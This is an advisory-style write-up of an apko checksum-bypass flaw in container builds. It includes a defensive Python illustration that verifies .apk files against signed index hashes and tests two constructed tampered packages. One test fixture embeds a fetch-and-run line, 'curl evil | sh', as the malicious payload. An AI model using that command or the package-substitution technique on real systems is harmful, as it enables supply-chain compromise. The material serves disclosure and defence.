## apko Container Image Builder Exposed by Checksum Bypass Flaw in CVE-2026-42575
A high-severity vulnerability in apko, the tool used to build and publish OCI container images from Alpine Linux apk packages, has been disclosed as CVE-2026-42575 with a CVSS score of 7.5. The flaw breaks a link in the container supply-chain security model: apko verifies the cryptographic signature on the APKINDEX.tar.gz package index, but it does not check that each individually downloaded .apk file matches the checksum the signed index records for it. Because the index is never compared against the artifacts it describes, an attacker who can alter what the build downloads can substitute a malicious or tampered package without the build detecting it.

The vulnerability affects all versions of apko prior to 1.2.7. Under normal operation, apko fetches apk packages from repositories to assemble minimal container images, and the security assumption is that the signed index provides integrity guarantees for every package it lists. Without the checksum comparison, that guarantee covers only the index itself. An attacker positioned to intercept or modify network traffic, or who controls a compromised mirror, can serve altered .apk files and leave the signed index untouched: the index still validates, the package name and version still match an entry, and the file contents are never compared against the recorded hash. The attack requires control of the delivery path (network or mirror), not of the upstream package build, which is exactly the position a per-artifact checksum is meant to defend against.

The fix in version 1.2.7 closes this gap by enforcing checksum verification for each downloaded package before it is used. Organizations using apko in CI/CD pipelines or container build workflows should treat this as a supply-chain security priority and upgrade immediately; `apko version` reports the running release. Until the upgrade lands, fetching only from repositories over TLS and from mirrors you control narrows the attacker's opportunity but does not replace the check. The vulnerability illustrates a recurring pattern in supply-chain defenses: partial cryptographic verification creates a false sense of security. A signature over an index binds only the index bytes; the per-package checksums inside it are what bind each artifact to that signature, so a tool that verifies the manifest but never compares the artifact hashes against it is effectively accepting unauthenticated artifacts at the point of delivery.
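The following is an added example written for this page to show the missing link concretely; it is not apko's code and not the 1.2.7 fix. It follows the apk v2 layout as the author of this example understands it (a .apk is three concatenated gzip members: signature, control, data; the index's `C:` field is `Q1` plus base64 of the SHA-1 over the compressed control member; `.PKGINFO` inside the control tar carries `datahash`, the hex SHA-256 of the compressed data member). The index text, the packages and the two substitution attempts are constructed inline, and verification of the APKINDEX signature itself is assumed to have already happened. `accept_before_fix` models the gap the advisory describes; `verify_package` is the check that closes it.

```python
"""Checking .apk files against the checksums in a signed APKINDEX (illustration)."""
import base64
import gzip
import hashlib
import hmac
import io
import tarfile
import zlib


def parse_apkindex(text: str) -> dict:
    """Parse blank-line-separated 'K:value' records into {pkgname: {field: value}}."""
    packages = {}
    for record in text.strip().split("\n\n"):
        fields = dict(line.partition(":")[::2] for line in record.splitlines())
        packages[fields["P"]] = fields
    return packages


def split_gzip_members(data: bytes) -> list:
    """Return the raw bytes of each gzip member in a concatenated gzip stream."""
    members = []
    while data:
        d = zlib.decompressobj(wbits=16 + zlib.MAX_WBITS)  # wbits 31: one gzip member
        d.decompress(data)
        if not d.eof:
            raise ValueError("truncated gzip member")
        used = len(data) - len(d.unused_data)
        members.append(data[:used])
        data = d.unused_data
    return members


def control_checksum(control_gz: bytes) -> str:
    """APKINDEX-style checksum: 'Q1' + base64(SHA-1) over the compressed control member."""
    return "Q1" + base64.b64encode(hashlib.sha1(control_gz).digest()).decode()


def read_pkginfo(control_gz: bytes) -> dict:
    """Extract 'key = value' pairs from .PKGINFO inside the control tar."""
    with tarfile.open(fileobj=io.BytesIO(control_gz), mode="r:gz") as tf:
        text = tf.extractfile(".PKGINFO").read().decode()
    return dict(line.split(" = ", 1) for line in text.splitlines() if " = " in line)


def accept_before_fix(index: dict, name: str, apk: bytes) -> bool:
    """The gap: trust the signed index and accept any listed package as delivered."""
    return name in index


def verify_package(index: dict, name: str, apk: bytes) -> bool:
    """Chain: signed index -> C: over control member -> datahash in .PKGINFO -> data member."""
    entry = index.get(name)
    if entry is None:
        return False
    try:
        _signature_gz, control_gz, data_gz = split_gzip_members(apk)  # exactly three members
    except ValueError:
        return False
    if not hmac.compare_digest(entry["C"], control_checksum(control_gz)):
        return False  # control segment is not the one the index was signed over
    datahash = read_pkginfo(control_gz).get("datahash", "")
    return hmac.compare_digest(datahash, hashlib.sha256(data_gz).hexdigest())


# ---- constructed sample data (not real Alpine packages) ----
def tar_bytes(entries: dict) -> bytes:
    """Build an in-memory tar archive from {path: content}."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        for path, content in entries.items():
            info = tarfile.TarInfo(path)
            info.size = len(content)
            tf.addfile(info, io.BytesIO(content))
    return buf.getvalue()


def make_control(data_gz: bytes) -> bytes:
    """Compressed control tar whose .PKGINFO datahash matches the given data member."""
    pkginfo = f"pkgname = demo\npkgver = 1.0-r0\ndatahash = {hashlib.sha256(data_gz).hexdigest()}\n"
    return gzip.compress(tar_bytes({".PKGINFO": pkginfo.encode()}), mtime=0)


SIGNATURE_GZ = gzip.compress(tar_bytes({".SIGN.RSA.demo.rsa.pub": b"placeholder"}), mtime=0)
GOOD_DATA = gzip.compress(tar_bytes({"usr/bin/demo": b"#!/bin/sh\necho demo\n"}), mtime=0)
EVIL_DATA = gzip.compress(tar_bytes({"usr/bin/demo": b"#!/bin/sh\ncurl evil | sh\n"}), mtime=0)
GOOD_CONTROL = make_control(GOOD_DATA)
GOOD_APK = SIGNATURE_GZ + GOOD_CONTROL + GOOD_DATA
# The (assumed already signature-checked) index entry describing the good package.
SAMPLE_APKINDEX = f"C:{control_checksum(GOOD_CONTROL)}\nP:demo\nV:1.0-r0\nA:x86_64\n"
# Two substitutions that leave the signed index untouched.
TAMPERED_DATA_ONLY = SIGNATURE_GZ + GOOD_CONTROL + EVIL_DATA          # keeps control, swaps data
TAMPERED_REPACKED = SIGNATURE_GZ + make_control(EVIL_DATA) + EVIL_DATA  # self-consistent, different control

if __name__ == "__main__":
    index = parse_apkindex(SAMPLE_APKINDEX)
    for label, apk in [("good", GOOD_APK), ("data-only", TAMPERED_DATA_ONLY), ("repacked", TAMPERED_REPACKED)]:
        print(f"{label:10} before-fix={accept_before_fix(index, 'demo', apk)} verified={verify_package(index, 'demo', apk)}")
```

The two tampered packages show why both comparisons matter: swapping only the data member leaves the index checksum intact and is caught by the `datahash` link inside the control segment, while repacking with a consistent `.PKGINFO` changes the control member and is caught by the `C:` comparison against the signed index. Either way the attacker never had to touch the index, which is exactly why a tool that only checks the index signature accepts both.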
---
- **Source**: Mastodon:mastodon.social:#infosec
- **Sector**: The Lab
- **Tags**: CVE-2026-42575, apko, container-security, supply-chain, checksum-bypass
- **Credibility**: unverified
- **Published**: 2026-05-10 07:31:46
- **ID**: 81454
- **URL**: https://whisperx.ai/en/intel/81454